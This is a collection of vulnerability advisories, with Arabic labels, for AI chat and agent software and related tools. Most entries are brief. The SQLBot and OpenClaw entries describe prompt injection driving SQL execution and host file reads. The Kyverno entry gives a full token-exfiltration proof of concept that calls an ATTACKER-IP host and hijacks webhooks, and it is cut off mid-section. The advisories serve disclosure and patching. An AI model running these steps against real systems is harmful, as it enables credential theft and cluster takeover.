الوصف الكامل

Improper authorization in Microsoft Teams allows an authorized attacker to disclose information over a network.

نوع الثغرة

CWE-285 — CWE-285

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N

المراجع

الوصف الكامل

OpenClaw before 2026.4.15 contains an authorization bypass vulnerability in Matrix room control-command authorization that trusts DM pairing-store entries. Attackers with DM-paired sender IDs can execute room control commands without being in configured allowlists by posting in bot rooms, potentially enabling privileged OpenClaw behavior.

الإصدارات المتأثرة

2026.4.15

نوع الثغرة

CWE-863 — Incorrect Authorization

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

المراجع

الوصف الكامل

Dify before version 1.14.0 contains an authorization bypass vulnerability that allows authenticated users to read the full contents of files uploaded by other users within the same tenant by supplying an arbitrary file UUID in the files array of a chat-messages request. Attackers can exploit insufficient permission verification in the chat-messages endpoints to access files without ownership validation, bypassing workspace separation and signed URL protections to retrieve sensitive file contents through workflow processing.

نوع الثغرة

CWE-639 — IDOR

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

المراجع

الوصف الكامل

SQLBot is an intelligent Text-to-SQL system based on large language models and RAG. In versions 1.7.0 and earlier, the Text2SQL chat interface is vulnerable to prompt injection. The user-provided question parameter is directly concatenated into the LLM prompt without filtering or escaping, and the SQL extracted from the LLM response is executed against the database without validation or sanitization. An authenticated attacker can craft a malicious question to manipulate the LLM into generating and executing arbitrary SQL statements. When connected to a PostgreSQL data source, this can lead to remote code execution via COPY FROM PROGRAM. This issue has been fixed in version 1.7.1.

الإصدارات المتأثرة

1.7.1

نوع الثغرة

CWE-89 — SQL Injection

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

المراجع

الوصف الكامل

A vulnerability was found in chatchat-space Langchain-Chatchat up to 0.3.1.3. The affected element is the function _get_file_id of the file libs/chatchat-server/chatchat/server/api_server/openai_routes.py of the component Uploaded File Handler. Performing a manipulation results in insufficiently random values. Access to the local network is required for this attack. The attack's complexity is rated as high. The exploitability is described as difficult. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet.

الإصدارات المتأثرة

All versions < 0.3.0, 0.3.0.20240506, 0.3.0.20240606, 0.3.0.20240610, 0.3.0.20240610.1

نوع الثغرة

CWE-310 — Crypto Issue

CVSS Vector

CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N

المراجع

الوصف الكامل

A vulnerability has been found in chatchat-space Langchain-Chatchat up to 0.3.1.3. Impacted is the function files of the file libs/chatchat-server/chatchat/server/api_server/openai_routes.py of the component OpenAI-Compatible File Upload API. Such manipulation of the argument file.filename leads to time-of-check time-of-use. Access to the local network is required for this attack to succeed. The attack requires a high level of complexity. The exploitability is considered difficult. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet.

الإصدارات المتأثرة

All versions < 0.3.0, 0.3.0.20240506, 0.3.0.20240606, 0.3.0.20240610, 0.3.0.20240610.1

نوع الثغرة

CWE-362 — Race Condition

CVSS Vector

CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N

المراجع

الوصف الكامل

A flaw has been found in chatchat-space Langchain-Chatchat up to 0.3.1.3. This issue affects the function PIL.Image.tobytes of the file libs/chatchat-server/chatchat/webui_pages/dialogue/dialogue.py of the component Vision Chat Paste Image Handler. This manipulation of the argument paste_image.image_data causes use of weak hash. The attacker needs to be present on the local network. The attack is considered to have high complexity. The exploitability is assessed as difficult. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.

الإصدارات المتأثرة

All versions < 0.3.0, 0.3.0.20240506, 0.3.0.20240606, 0.3.0.20240610, 0.3.0.20240610.1

نوع الثغرة

CWE-327 — Weak Crypto

CVSS Vector

CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N

المراجع

الوصف الكامل

A vulnerability was detected in chatchat-space Langchain-Chatchat up to 0.3.1.3. This vulnerability affects the function files/list_files/retrieve_file/retrieve_file_content/delete_file of the file libs/chatchat-server/chatchat/server/api_server/openai_routes.py of the component Compatible File Service. The manipulation results in missing authentication. The attacker must have access to the local network to execute the attack. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet.

نوع الثغرة

CWE-287 — Auth Bypass

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

المراجع

الوصف الكامل

## Summary Microsoft Teams SSO invoke handler missed sender authorization checks. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `>= 2026.4.10 < 2026.4.14` - Patched versions: `>= 2026.4.14` ## Impact Microsoft Teams SSO signin invoke handling could process an invoke from a sender before applying the same sender allowlist checks used by normal message handling. ## Technical Details The fix routes SSO invoke handling through the Teams sender authorization path and adds coverage for denied senders. ## Fix The issue was fixed in #66033. The first stable tag containing the fix is `v2026.4.14`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `80b1fa17bfc3f6a668492f0326ea52f48bb89776` - PR: #66033 ## Release Process Note Users should upgrade to `openclaw` 2026.4.14 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.

الإصدارات المتأثرة

2026.4.10 - 2026.4.14

نوع الثغرة

CWE-862 — Missing Authorization

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

المراجع

الوصف الكامل

## Summary Discord event cover images bypassed sandbox media normalization. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `>= 2026.4.7 < 2026.4.10` - Patched versions: `>= 2026.4.10` ## Impact Discord event cover image parameters could bypass the sandbox media normalization path used for outbound local media, allowing host-local media references to reach a channel action path that expected normalized media. ## Technical Details The fix includes Discord `eventCreate.image` in sandbox media normalization and adds coverage for the event-create media path. ## Fix The issue was fixed in #64377. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `979c6f09d6fad96596feb91c905934be7e0b4f15` - PR: #64377 ## Release Process Note Users should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.

الإصدارات المتأثرة

2026.4.7 - 2026.4.10

نوع الثغرة

CWE-184 — CWE-184

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

المراجع

الوصف الكامل

The GeekyBot — Generate AI Content Without Prompt, Chatbot and Lead Generation plugin for WordPress is vulnerable to SQL Injection via the 'attributekey' parameter in versions up to, and including, 1.2.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

نوع الثغرة

CWE-89 — SQL Injection

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

المراجع

الوصف الكامل

## Summary The HTTP login endpoints (`POST /login` and `POST /signalk/v1/auth/login`) are protected by `express-rate-limit` (default: 100 attempts per 10-minute window, configurable via `HTTP_RATE_LIMITS`). The WebSocket login path — sending `{login: {username, password}}` messages over an established WebSocket connection — calls `app.securityStrategy.login()` directly without any rate limiting. An attacker can bypass HTTP rate limiting entirely by opening a WebSocket connection and attempting unlimited password guesses at the speed bcrypt allows (~20 attempts/sec with 10 salt rounds). ## Details **Vulnerable code:** `src/interfaces/ws.ts`, function `processLoginRequest` (lines 753-780) The function directly calls `app.securityStrategy.login(msg.login.username, msg.login.password)` with no throttling or attempt tracking. **Rate-limited HTTP path for comparison:** `src/tokensecurity.ts` lines 609-617 apply `loginLimiter` middleware to the HTTP login routes at line 637. ## Steps to Reproduce 1. Start Signal K server with security enabled 2. Open a WebSocket connection to `ws://server:3000/signalk/v1/stream?subscribe=none` 3. Wait for the hello message 4. Send login attempts in rapid succession: ```json {"requestId": "1", "login": {"username": "admin", "password": "guess1"}} {"requestId": "2", "login": {"username": "admin", "password": "guess2"}} ``` 5. Observe that all attempts are processed without any 429 response or throttling 6. For comparison, send 100+ HTTP POST requests to `/signalk/v1/auth/login` — the 101st returns 429 A POC script is available that demonstrates both the HTTP rate limiting working correctly and the WebSocket path accepting unlimited attempts. ## Impact - Credential brute-forcing via the WebSocket protocol at ~20 attempts/sec (bcrypt-limited) - Complete bypass of the HTTP rate limiting defense - A single WebSocket connection is sufficient for unlimited attempts - With multiple parallel connections, throughput multiplies - A 10,000-word dictionary attack completes in ~8 minutes over a single connection Signal K servers are commonly deployed on boat networks where they may be accessible to other devices on the same LAN. ## CWE CWE-307: Improper Restriction of Excessive Authentication Attempts ## Suggested Fix Track failed login attempts per remote IP in a shared store (or reuse the existing express-rate-limit store) that is checked in both the HTTP login middleware and the processLoginRequest WebSocket handler. ## Context Found while building an open source maritime security scanner. Verified on v2.24.0 (current master). Discovered by Mark Curphey

الإصدارات المتأثرة

All versions < 2.25.0

نوع الثغرة

CWE-307 — CWE-307

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N

المراجع

الوصف الكامل

A security vulnerability has been detected in Telegram Desktop up to 6.7.5. This vulnerability affects the function RequestButton of the file Telegram/SourceFiles/boxes/url_auth_box.cpp of the component Bot API. The manipulation of the argument login_url leads to null pointer dereference. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

نوع الثغرة

CWE-404 — CWE-404

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

المراجع

الوصف الكامل

A vulnerability has been found in ChatGPTNextWeb NextChat up to 2.16.1. Affected is the function addMcpServer of the file app/mcp/actions.ts. The manipulation leads to improper authorization. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet.

نوع الثغرة

CWE-266 — CWE-266

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

المراجع

الوصف الكامل

A flaw has been found in ChatGPTNextWeb NextChat up to 2.16.1. This impacts an unknown function of the file Next.js of the component API Endpoint. Executing a manipulation can lead to permissive cross-domain policy with untrusted domains. The attack may be launched remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.

نوع الثغرة

CWE-346 — CWE-346

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

المراجع

الوصف الكامل

## Impact OpenClaw deployments before `2026.4.15` could embed host-local audio files into webchat responses without applying the local media root containment check used by other media-serving paths. If an attacker could influence an agent or tool-produced `ReplyPayload.mediaUrl`, the webchat audio embedding helper could resolve an absolute local path or `file:` URL, read an audio-like file under the size cap, and base64-encode it into the webchat media response. This crossed the model/tool-output boundary into a host file read. Prompt injection or malicious tool output is a delivery mechanism; the security boundary failure is the missing local-root containment check. The impact is narrow: the file had to be readable by the gateway process, have an audio-like extension, and fit within the webchat audio size cap. The issue exposed contents into the webchat assistant/media transcript path; it was not a general remote filesystem API. ## Affected Packages / Versions - Package: `openclaw` on npm - Affected versions: `<= 2026.4.14` - Patched version: `2026.4.15` The latest public release, `2026.4.21`, also contains the fix. ## Patches The public fix threads the applicable local media roots into the webchat audio embedding path and calls `assertLocalMediaAllowed` before local audio content is read. Current `main` also includes an additional `trustedLocalMedia` gate so untrusted model/tool payloads cannot opt into local audio embedding. Fix commit: - `6e58f1f9f54bca1fea1268ec0ee4c01a2af03dde` ## Workarounds Upgrade to `openclaw@2026.4.15` or later. The latest public release, `2026.4.21`, is fixed. Before upgrading, avoid exposing webchat sessions to untrusted prompt/tool content that can influence reply media URLs. ## Credits OpenClaw thanks @zsxsoft for reporting.

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N

المراجع

الوصف الكامل

## Impact The `/chat` WebSocket endpoint used by the Chat Trigger node's Hosted Chat feature did not verify that an incoming connection was authorized to interact with the target execution. An unauthenticated remote attacker who could identify a valid execution ID for a workflow in a waiting state could attach to that execution, receive the pending prompt intended for the legitimate user, and submit arbitrary input to resume or influence downstream workflow behavior. Exploitation requires the following conditions: - The instance exposes a public Hosted Chat workflow with authentication set to `None`. - A target execution is in a waiting state at the time of the attack. - The attacker can obtain or discover the execution ID of that waiting execution. ## Patches The issue has been fixed in n8n versions 1.123.32, 2.17.4, and 2.18.1. Users should upgrade to one of these versions or later to remediate the vulnerability. ## Workarounds If upgrading is not immediately possible, administrators should consider the following temporary mitigations: - Enable authentication on all Chat Trigger nodes by setting the Authentication field to `n8n User Auth` rather than `None`. These workarounds do not fully remediate the risk and should only be used as short-term mitigation measures. --- n8n has adopted CVSS 4.0 as primary score for all security advisories. CVSS 3.1 vector strings are provided for backwards compatibility. CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

الإصدارات المتأثرة

< 1.123.32, >= 2.18.0, < 2.18.1, >= 2.0.0, < 2.17.4

نوع الثغرة

CWE-862 — Missing Authorization

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

المراجع

الوصف الكامل

A vulnerability was identified in NousResearch hermes-agent 0.8.0. Affected by this issue is some unknown functionality of the file gateway/platforms/wecom.py of the component WeChat Work Platform Adapter. The manipulation leads to path traversal. It is possible to initiate the attack remotely. The exploit is publicly available and might be used.

نوع الثغرة

CWE-22 — Path Traversal

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

المراجع

الوصف الكامل

DocsGPT is a GPT-powered chat for documentation. From version 0.15.0 to before version 0.16.0, an attacker accessing both the official DocsGPT website or any local and public deployment, can craft a malicious payload bypassing the "MCP test" behavior to achieve arbitrary remote code execution (RCE). This issue has been patched in version 0.16.0.

نوع الثغرة

CWE-77 — Command Injection

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

المراجع

الوصف الكامل

Jenkins Matrix Authorization Strategy Plugin 2.0-beta-1 through 3.2.9 (both inclusive) invokes parameterless constructors of classes specified in configuration when deserializing inheritance strategies, without restricting the classes that can be instantiated. This can be abused by attackers with Item/Configure permission to instantiate arbitrary types, which may lead to information disclosure or other impacts depending on the classes available on the classpath. Matrix Authorization Strategy Plugin 3.2.10 verifies that the class being instantiated is an inheritance strategy implementation, preventing instantiation of arbitrary types.

الإصدارات المتأثرة

2.0, 2.0-beta-1, 2.0-beta-2, 2.0-beta-3, 2.1

نوع الثغرة

CWE-502 — Deserialization

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

المراجع

الوصف الكامل

## Summary MS Teams webhook parses body before JWT validation, enabling unauthenticated resource exhaustion ## Current Maintainer Triage - Status: open - Normalized severity: medium - Assessment: v2026.3.28 still parses Teams JSON after only a Bearer-prefix gate and before real JWT validation, and the auth-before-parse fix is not yet shipped. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `3834d47099dd13c8244ed6de8b9ea9855c553623` — 2026-03-30T13:46:40+01:00 OpenClaw thanks @AntAISecurityLab for reporting.

الإصدارات المتأثرة

2026.3.31

نوع الثغرة

CWE-408 — CWE-408

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

المراجع

الوصف الكامل

## Summary Discord voice ingress authorization can be bypassed via channel, name, and stale-role validation gaps ## Current Maintainer Triage - Status: narrow - Assessment: Real in shipped v2026.3.28 Discord voice ingress, but impact is channel/member allowlist bypass rather than a broader critical auth break and mainline fix is unreleased. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `dba96e7507e0900f120e5e28e57755d69bf78759` — 2026-03-31T21:29:13+09:00 OpenClaw thanks @cyjhhh for reporting.

الإصدارات المتأثرة

2026.3.31

نوع الثغرة

CWE-862 — Missing Authorization

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

المراجع

الوصف الكامل

## Summary Discord voice manager bypasses channel-level member access allowlist ## Current Maintainer Triage - Status: open - Normalized severity: medium - Assessment: v2026.3.28 still accepts Discord voice ingress before channel allowlist authorization, and main-only gating means this remains a real shipped access-control bug. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `dba96e7507e0900f120e5e28e57755d69bf78759` — 2026-03-31T21:29:13+09:00 ## Release Process Note - The fix is already present in released version `2026.3.31`. - This draft looks ready for final maintainer disposition or publication, not additional code-fix work. Thanks @zsxsoft for reporting.

الإصدارات المتأثرة

2026.3.31

نوع الثغرة

CWE-863 — Incorrect Authorization

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

المراجع

الوصف الكامل

## Summary Matrix thread root and reply context bypass sender allowlist ## Current Maintainer Triage - Status: open - Normalized severity: medium - Assessment: Real in shipped v2026.3.28 Matrix because fetched thread-root/reply context bypasses sender allowlists, with unreleased mainline filtering fix. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `8a563d603b70ef6338915f0527bee87282c3bad5` — 2026-03-31T17:09:03+01:00 OpenClaw thanks @AntAISecurityLab for reporting.

الإصدارات المتأثرة

2026.3.31

نوع الثغرة

CWE-346 — CWE-346

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

المراجع

الوصف الكامل

## Summary Discord audio preflight transcription before member authorization ## Current Maintainer Triage - Status: narrow - Normalized severity: medium - Assessment: v2026.3.28 still runs Discord audio preflight before member allowlist rejection, but this is the same pre-auth resource-consumption class and not the high-severity auth-bypass framing in the draft. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `ee52f64226a03efadfdf1e3b759e13424a3d4e41` — 2026-03-30T14:38:22+01:00 OpenClaw thanks @AntAISecurityLab for reporting.

الإصدارات المتأثرة

2026.3.31

نوع الثغرة

CWE-408 — CWE-408

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

المراجع

الوصف الكامل

In Spring AI, an attacker can bypass conversation isolation and exfiltrate sensitive memory from other users’ chat histories, including secrets and credentials, by injecting filter logic through conversationId. Only applications that use VectorStoreChatMemoryAdvisor and pass user-supplied input as a conversationId are affected.

الإصدارات المتأثرة

1.0.0 - 1.0.6

نوع الثغرة

CWE-284 — CWE-284

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N

المراجع

الوصف الكامل

A vulnerability was identified in BigSweetPotatoStudio HyperChat up to 2.0.0-alpha.63. Affected by this issue is the function fetch of the file packages/core/src/http/aiProxyMiddleware.mts of the component AI Proxy Middleware. Such manipulation of the argument baseurl leads to server-side request forgery. The attack can be launched remotely. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.

نوع الثغرة

CWE-918 — SSRF

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

المراجع

الوصف الكامل

OpenClaw versions 2026.2.14 through 2026.3.24 fail to consistently apply guild and channel policy gates to Discord button and component interactions. Attackers can trigger privileged component actions from blocked contexts by bypassing channel policy enforcement.

الإصدارات المتأثرة

2026.2.14 - 2026.3.28

نوع الثغرة

CWE-863 — Incorrect Authorization

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N

المراجع

الوصف الكامل

## Summary MSTeams thread history bypasses sender allowlist via Graph API ## Current Maintainer Triage - Status: open - Normalized severity: medium - Assessment: Real in shipped v2026.3.28 MS Teams because Graph-fetched thread history bypasses sender allowlists, with unreleased mainline filtering fix. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `5cca38084074fb5095aa11b6a59820d63e4937c9` — 2026-03-30T15:38:26+01:00 OpenClaw thanks @AntAISecurityLab for reporting.

الإصدارات المتأثرة

2026.3.31

نوع الثغرة

CWE-441 — CWE-441

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

المراجع

الوصف الكامل

A weakness has been identified in ChatGPTNextWeb NextChat up to 2.16.1. This affects the function storeUrl of the file app/api/artifacts/route.ts of the component Artifacts Endpoint. This manipulation of the argument ID causes server-side request forgery. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.

نوع الثغرة

CWE-918 — SSRF

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

المراجع

الوصف الكامل

A security flaw has been discovered in ChatGPTNextWeb NextChat up to 2.16.1. Affected by this issue is the function proxyHandler of the file app/api/[provider]/[...path]/route.ts. The manipulation results in server-side request forgery. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.

نوع الثغرة

CWE-918 — SSRF

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

المراجع

الوصف الكامل

A vulnerability was detected in JoeCastrom mcp-chat-studio up to 1.5.0. Affected by this issue is some unknown functionality of the file server/routes/llm.js of the component LLM Models API. Performing a manipulation of the argument req.query.base_url results in server-side request forgery. Remote exploitation of the attack is possible. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet.

نوع الثغرة

CWE-918 — SSRF

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

المراجع

الوصف الكامل

A vulnerability was determined in code-projects Chat System 1.0. Affected is an unknown function of the file update_user.php of the component MD5 Hash Handler. This manipulation of the argument Password causes use of weak hash. The attack is possible to be carried out remotely. The attack's complexity is rated as high. The exploitability is told to be difficult. The exploit has been publicly disclosed and may be utilized.

نوع الثغرة

CWE-327 — Weak Crypto

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

المراجع

الوصف الكامل

A vulnerability was detected in code-projects Chat System 1.0. This affects an unknown function of the file /admin/send_message.php of the component Chat Interface. The manipulation of the argument msg results in cross site scripting. The attack may be launched remotely. The exploit is now public and may be used.

نوع الثغرة

CWE-79 — XSS

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N

المراجع

الوصف الكامل

A weakness has been identified in Toowiredd chatgpt-mcp-server up to 0.1.0. Affected by this issue is some unknown functionality of the file src/services/docker.service.ts of the component MCP/HTTP. This manipulation causes os command injection. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.

نوع الثغرة

CWE-77 — Command Injection

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

المراجع

الوصف الكامل

A client holding only a read JWT scope can still register itself as a signal provider through the production kuksa.val.v2 OpenProviderStream API by sending ProvideSignalRequest. 1. Obtain any valid token with only read scope. 2. Connect to the normal production gRPC API (kuksa.val.v2). 3. Open OpenProviderStream. 4. Send ProvideSignalRequest for a target signal ID. 5. Wait for the broker to forward GetProviderValueRequest. 6. Reply with attacker-controlled GetProviderValueResponse. 7. Other clients performing GetValue / GetValues for that signal receive forged data.

نوع الثغرة

CWE-306 — Auth Bypass

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

المراجع

الوصف الكامل

The HubSpot All-In-One Marketing - Forms, Popups, Live Chat plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 11.3.32 via the leadin/public/admin/class-adminconstants.php file. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract a list of all installed plugins and their versions which can be leveraged for reconnaissance and further attacks.

نوع الثغرة

CWE-862 — Missing Authorization

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

المراجع

الوصف الكامل

## Summary Kyverno's apiCall feature in ClusterPolicy automatically attaches the admission controller's ServiceAccount token to outgoing HTTP requests. The service URL has no validation — it can point anywhere, including attacker-controlled servers. Since the admission controller SA has permissions to patch webhook configurations, a stolen token leads to full cluster compromise. ## Affected version Tested on Kyverno v1.17.1 (Helm chart default installation). Likely affects all versions with apiCall service support. ## Details There are two issues that combine into one attack chain. The first is in `pkg/engine/apicall/executor.go` around line 138. The service URL from the policy spec goes straight into `http.NewRequestWithContext()`: ```go req, err := http.NewRequestWithContext(ctx, string(apiCall.Method), apiCall.Service.URL, data) ``` No scheme check, no IP restriction, no allowlist. The policy validation webhook (`pkg/validation/policy/validate.go`) only looks at JMESPath syntax. The second is at lines 155-159 of the same file. If the request doesn't already have an Authorization header, Kyverno reads its own SA token and injects it: ```go if req.Header.Get("Authorization") == "" { token := a.getToken() req.Header.Add("Authorization", "Bearer "+token) } ``` The token is the admission controller's long-lived SA token from `/var/run/secrets/kubernetes.io/serviceaccount/token`. With the default Helm install, this SA (`kyverno-admission-controller`) can read and PATCH both `MutatingWebhookConfiguration` and `ValidatingWebhookConfiguration`. ## Reproduction **Environment**: Kyverno v1.17.1, K3s v1.34.5, single-node cluster, default Helm install **Step 1**: Start an HTTP listener on an attacker machine: ```python # capture_server.py from http.server import HTTPServer, BaseHTTPRequestHandler import json, datetime class Handler(BaseHTTPRequestHandler): def do_GET(self): print(json.dumps({ "timestamp": str(datetime.datetime.now()), "path": self.path, "headers": dict(self.headers) }, indent=2)) self.send_response(200) self.send_header("Content-Type", "application/json") self.end_headers() self.wfile.write(b'{"ok": true}') HTTPServer(("0.0.0.0", 9999), Handler).serve_forever() ``` **Step 2**: Create a ClusterPolicy that calls the attacker server: ```yaml apiVersion: kyverno.io/v1 kind: ClusterPolicy metadata: name: ssrf-poc spec: validationFailureAction: Audit background: false rules: - name: exfil match: any: - resources: kinds: - Pod context: - name: exfil apiCall: service: url: "http://ATTACKER-IP:9999/steal" method: GET jmesPath: "@" validate: message: "check" deny: conditions: any: - key: "{{ exfil }}" operator: Equals value: "NEVER_MATCHES" ``` **Step 3**: Create any pod to trigger policy evaluation: ```bash kubectl run test --image=nginx ``` **Step 4**: The listener receives the SA token immediately: ``` Authorization: Bearer eyJhbGciOiJSUzI1NiIs... ``` Decoded JWT `sub` claim: `system:serviceaccount:kyverno:kyverno-admission-controller` Every subsequent pod creation sends the token again. No race condition, no timing — it fires every time. **Step 5**: Use the token to hijack webhooks: ```bash # Verify permissions kubectl auth can-i patch mutatingwebhookconfigurations \ --as=system:serviceaccount:kyverno:kyverno-admission-controller # yes # Patch the webhook to redirect to attacker kubectl patch mutatingwebhookconfiguration kyverno-policy-mutating-webhook-cfg \ --type='json' \ -p='[{"op":"replace","path":"/webhooks/0/clientConfig/url","value":"https://ATTACKER:443/mutate"}]' \ --token="eyJhbG..." ``` After this, every K8s API request that triggers the webhook goes to the attacker's server. The attacker can mutate any pod spec — inject containers, mount host paths, add privileged security contexts. ## Verified permissions of stolen token Tested with the default Helm installation: | Action | Result | |--------|--------| | List pods (all namespaces) | Allowed | | Read configmaps in kube-system | Allowed | | PATCH MutatingWebhookConfiguration | **Allowed** | | PATCH ValidatingWebhookConfiguration | **Allowed** | | Read secrets (cluster-wide) | Denied (per-NS only) | ## Impact An attacker who can create ClusterPolicy resources (or who compromises a service account with that permission) can steal Kyverno's admission controller token and use it to: 1. Hijack Kyverno's own mutating/validating webhooks 2. Intercept and modify every API request flowing through the cluster 3. Inject malicious containers, escalate privileges, exfiltrate secrets The token is also sent to internal endpoints — `http://169.254.169.254/latest/meta-data/` works, so on cloud-hosted clusters (EKS, GKE, AKS) this also leaks cloud IAM credentials. RBAC note: 